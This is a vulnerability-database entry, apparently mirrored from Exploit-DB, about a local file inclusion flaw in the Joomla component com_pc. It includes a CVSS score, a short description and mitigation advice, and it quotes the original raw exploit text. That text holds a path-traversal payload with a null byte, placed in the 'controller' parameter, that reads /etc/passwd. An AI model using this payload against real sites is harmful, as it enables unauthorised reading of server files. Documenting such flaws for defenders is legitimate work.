Joomla Component com_pc LFI Vulnerability

vendor:

Joomla Component com_pc

by:

Pyske

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: Joomla Component com_pc

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Joomla Component com_pc LFI Vulnerability

The Joomla Component com_pc is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability by manipulating the 'controller' parameter in the URL to include arbitrary files from the server, such as sensitive system files like '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Joomla component to the latest version, or apply any available patches or security updates provided by the vendor.

Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_pc LFI Vulnerability
#############################################################

# Author : Pyske


# Name : com_pc


# Home : www.cyber-warrior.org


# Greez : N0kt4 , fl0rix , F0RTS3V3N , KaBaDaY&#305; , Blackapple All Cyber-warrior


# Bug Type : Local File Inlusion



# Demo Vuln. : http://server/index.php?option=com_pc&controller= [LFI]



#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_pc&controller=index.php?option=com_pc&controller=../../../../../../../etc/passwd%00

< -- bug code end of -- >